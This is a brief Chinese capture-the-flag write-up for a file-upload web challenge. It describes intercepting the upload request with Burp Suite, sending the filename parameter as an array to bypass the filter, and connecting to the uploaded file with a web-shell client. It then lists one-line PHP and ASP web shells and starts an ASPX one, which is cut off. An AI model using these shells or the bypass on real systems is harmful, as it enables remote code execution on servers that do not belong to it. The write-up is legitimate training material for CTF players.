解網鼎杯一道web題(wafUpload)

思路:burpsuite截取post數據包,上傳木馬,菜刀連接。 截取上傳的數據包,對filename參數使用數組繞過,上傳php.php,同時得到php.php路徑。 附: PHP一句話木馬:<?php @eval($_POST['key']);?> ASP一句話木馬:<%eval request['key']%> ASPX一句話木馬:<%@ Page Language="Jscript"%><
相關文章
相關標籤/搜索